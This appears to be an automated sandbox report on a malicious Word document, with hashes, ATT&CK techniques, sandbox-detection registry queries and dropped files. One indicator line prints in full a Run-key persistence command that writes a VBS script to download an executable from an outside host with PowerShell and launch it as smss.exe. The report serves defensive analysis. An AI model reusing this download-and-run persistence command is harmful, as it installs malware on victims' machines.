28be1bcfd275756888fe4e1e2d866d7af521022f9a13e0267778e63e8ae98aa7

General

Target

504368519288583f7d6b6981c641b4b9509bdee7aac1e0d6c2371fc952451392.doc
Size

179KB
MD5

e267aa39a15e33909dae39ec74828f8b
SHA1

ed519641868e38c0531358622bc10b863979e301
SHA256

504368519288583f7d6b6981c641b4b9509bdee7aac1e0d6c2371fc952451392
SHA512

95d9712e8f760e589761337376b329c28e9b5ee2d6ededd77e9dae29dc5dab41927f382562848bd3e2dfeb72859ec6d373335cc51d6c91bf60c1a10da735bb8e
SSDEEP

3072:Ean7O40C8HRLzZI5Cb1WdqfzdVWnTqUJxDZaQnRBvbmV8tbB:Ean7t0tRHK5C+qfzdVoqwB8Qqk

Score

6^/10

persistence

Malware Config

Signatures

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MS_Office = "cmd /c echo WScript.CreateObject(\"WScript.Shell\").run \"cmd /c powershell iwr -outf %tmp%\\smss.exe https://shoru.net/db/main_db & start %tmp%\\smss.exe\",0,false>\"C:\\Users\\Public\\Libraries\\lib.vbs\"&wscript \"C:\\Users\\Public\\Libraries\\lib.vbs\""	WINWORD.EXE

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
5640	WINWORD.EXE
5640	WINWORD.EXE

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
5640	WINWORD.EXE
5640	WINWORD.EXE
5640	WINWORD.EXE
5640	WINWORD.EXE
5640	WINWORD.EXE
5640	WINWORD.EXE
5640	WINWORD.EXE
5640	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\504368519288583f7d6b6981c641b4b9509bdee7aac1e0d6c2371fc952451392.doc" /o ""
1⤵
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCDAA30.tmp\sist02.xsl

Filesize
245KB

MD5
f883b260a8d67082ea895c14bf56dd56

SHA1
7954565c1f243d46ad3b1e2f1baf3281451fc14b

SHA256
ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

SHA512
d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
1KB

MD5
ec1d93dc8461b88d40e865982e3852c9

SHA1
0fdef2717d204b7813a3232564efbe571cbf8672

SHA256
423d5c9c293f9501b79eec2a17000c1d0647d3acc20a26d004a464c887da9452

SHA512
dbc8ab830a94a8f821fd3ea546f51871f03200fa8b0a54efc70760f7344f027b9e049b72c7a651330fdd131e6a29b5fca3bb90c36eb7d1866a206111b3b68f2f

Download Submit
memory/5640-10-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-4-0x00007FFB94210000-0x00007FFB94220000-memory.dmp

Filesize
64KB

Download
memory/5640-9-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-8-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-13-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-14-0x00007FFB92120000-0x00007FFB92130000-memory.dmp

Filesize
64KB

Download
memory/5640-12-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-15-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-11-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-18-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-17-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-19-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-16-0x00007FFB92120000-0x00007FFB92130000-memory.dmp

Filesize
64KB

Download
memory/5640-1-0x00007FFBD422D000-0x00007FFBD422E000-memory.dmp

Filesize
4KB

Download
memory/5640-2-0x00007FFB94210000-0x00007FFB94220000-memory.dmp

Filesize
64KB

Download
memory/5640-7-0x00007FFB94210000-0x00007FFB94220000-memory.dmp

Filesize
64KB

Download
memory/5640-81-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-50-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-51-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-52-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-6-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-79-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-5-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-80-0x00007FFBD422D000-0x00007FFBD422E000-memory.dmp

Filesize
4KB

Download
memory/5640-82-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-83-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-3-0x00007FFB94210000-0x00007FFB94220000-memory.dmp

Filesize
64KB

Download
memory/5640-92-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-93-0x00007FFBD4190000-0x00007FFBD4385000-memory.dmp

Filesize
2.0MB

Download
memory/5640-0-0x00007FFB94210000-0x00007FFB94220000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads